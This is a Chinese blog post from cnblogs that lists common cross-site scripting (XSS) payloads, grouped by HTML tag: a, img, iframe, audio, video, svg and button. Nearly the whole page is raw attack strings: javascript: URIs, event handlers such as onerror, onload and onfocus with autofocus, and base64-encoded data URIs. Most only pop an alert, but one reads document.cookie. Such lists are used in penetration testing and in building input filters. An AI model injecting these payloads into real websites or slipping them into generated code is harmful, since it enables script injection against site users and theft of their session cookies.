首页 > 其他分享 >xss常用标签

xss常用标签

时间:2024-05-08 12:13:02浏览次数:20  
标签:test xss 常用 标签

<a> 标签

  • <a href="javascript:alert(1)">test</a>
  • <a href="x" onfocus="alert('xss');" autofocus="">xss</a>
  • <a href="x" onclick=eval("alert('xss');")>xss</a>
  • <a href="x" onm ouseover="alert('xss');">xss</a>
  • <a href="x" onm ouseout="alert('xss');">xss</a>

<img>标签

  • <img src=x one rror="alert(1)">
  • <img src=x one rror=eval("alert(1)")>
  • <img src=1 onm ouseover="alert('xss');">
  • <img src=1 onm ouseout="alert('xss');">
  • <img src=1 onclick="alert('xss');">

<iframe>标签

  • <iframe src="javascript:alert(1)">test</iframe>
  • <iframe onl oad="alert(document.cookie)"></iframe>
  • <iframe onl oad="alert('xss');"></iframe>
  • <iframe onl oad="base64,YWxlcnQoJ3hzcycpOw=="></iframe>
  • <iframe onm ouseover="alert('xss');"></iframe>
  • <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

<audio> 标签

  • <audio src=1 one rror=alert(1)>
  • <audio><source src="x" one rror="alert('xss');"></audio>
  • <audio controls onfocus=eval("alert('xss');") autofocus=""></audio>
  • <audio controls onm ouseover="alert('xss');"><source src="x"></audio>

<video>标签

  • <video src=x one rror=alert(1)>
  • <video><source one rror="alert('xss');"></video>
  • <video controls onm ouseover="alert('xss');"></video>
  • <video controls onfocus="alert('xss');" autofocus=""></video>
  • <video controls onclick="alert('xss');"></video>

<svg> 标签

  • <svg onl oad=javascript:alert(1)>
  • <svg onl oad="alert('xss');"></svg>

<button>标签

  • <button onclick=alert(1)>
  • <button onfocus="alert('xss');" autofocus="">xss</button>
  •  <button onclick="alert('xss');">xss</button>
  • <button onm ouseover="alert('xss');">xss</button>
  •  <button onm ouseout="alert('xss');">xss</button>
  •  <button onm ouseup="alert('xss');">xss</button>
  •  <button onm ousedown="alert('xss');"></button>

标签:test,xss,常用,标签
From: https://www.cnblogs.com/lovexiaoxingxing/p/18179391

相关文章

  • xss漏洞
    xss漏洞的介绍:原理sql注入的本质是什么?就是把用户输入的数据不是正常的数据而是sql代码,然后被执行,Xss漏洞的原理其实就是前端写的有毛病,你能够自定义的去嵌入js代码让他去执行,讲的再明白一点就是,服务端把用户输入的数据当成前端代码去执行了  利用条件:用户输入的数据......
  • 常用Linux开发工具(finalshell,)
    稳定,免费,国产,跨平台官网,http://www.hostbuf.com/,总结使用体验,简约不简单 下载……安装……华北直连本地测试服务器确保ssh_key,由运维同学帮忙配置好。配置finalshell,1,2,3,…… 点击配置记录,或者历史记录,开始coding  华北跳板机远程155确保本机的ssh_key,已经由......
  • labelme标注后的json文件去掉某个类别的标签并生成新的json文件
    以去掉secondary_particle标签为例点击查看代码importjsonimportos#去除标注图像中的一次颗粒标签defremove_specific_labels(json_file):withopen(json_file,'r',encoding='utf-8',errors='ignore')asf:data=json.load(f)if"s......
  • Linux常用命令
    1.chmod777test.txt读,r:4写,w:2执行,x:1所以全部权限是7,因为需要分别设置所有者,所在组,其他人的权限所以是777.2.处理目录ls(英文全拼:listfiles):列出目录及文件名cd(英文全拼:changedirectory):切换目录pwd(英文全拼:printworkdirectory):显示目前的目录mkdir(英文全拼:makedi......
  • [a]html中a标签跨域属性download无效,即预期下载变成了预览
    同源,a标签downlaod属性浏览器基本都支持下载非同源,提供两个下载方法functiondownloadFile(url,filename){fetch(url).then(response=>{returnresponse.blob();}).then(blob=>{consta=document......
  • 常用功能方法记录
    #region获取物料辅助操作记录分页数据///<summary>///获取物料辅助操作记录分页数据///</summary>///<paramname="query"></param>///<returns></returns>publicasyncTask<PageModel<WoMaterialOperationRecorDTO>>GetWoMateri......
  • MongoDB基本常用命令
    MongoDB基本常用命令数据库操作选择和创建数据库选择和创建数据库的语法格式:use数据库名称如果数据库不存在则自动创建,例如,以下语句创建articledb数据库:usearticledb查看有权限查看的所有的数据库命令showdbs或showdatabases注意:在MongoDB中,集合只有在内......
  • 常用的数据结构
    日常开发中,可能会用到的数据结构类型数组一组相同类型的元素的集合,可以通过下标进行访问和操作。在C#中,有Array、ArrayList、List时间复杂度:查找是O(N)。插入和删除是O(N)。数组通过下标直接访问元素,时间复杂度是O(1)。数据的每次新增或者删除,数据需要重新排列顺序,时间复杂......
  • 常用术语
    编程语言中的基本术语解释在编程的世界里,有许多专业术语,每一个都有其特定的含义和用途。本文将详细解释一些常见的编程术语,并探讨它们在JavaScript及其他编程语言中的应用。运算符运算符是用于执行特定操作的符号或关键字。在JavaScript中,运算符可以用来执行算术运算(如加+、减-......
  • 循环编码:时间序列中周期性特征的一种常用编码方式
    在深度学习或神经网络中,"循环编码"(CyclicalEncoding)是一种编码技术,其特点是能够捕捉输入或特征中的周期性或循环模式。这种编码方法常用于处理具有周期性行为的任务,比如时间序列预测或理解展示周期性特征的序列。循环编码的核心思想是将数据的周期性特征转化为网络能够理解的形......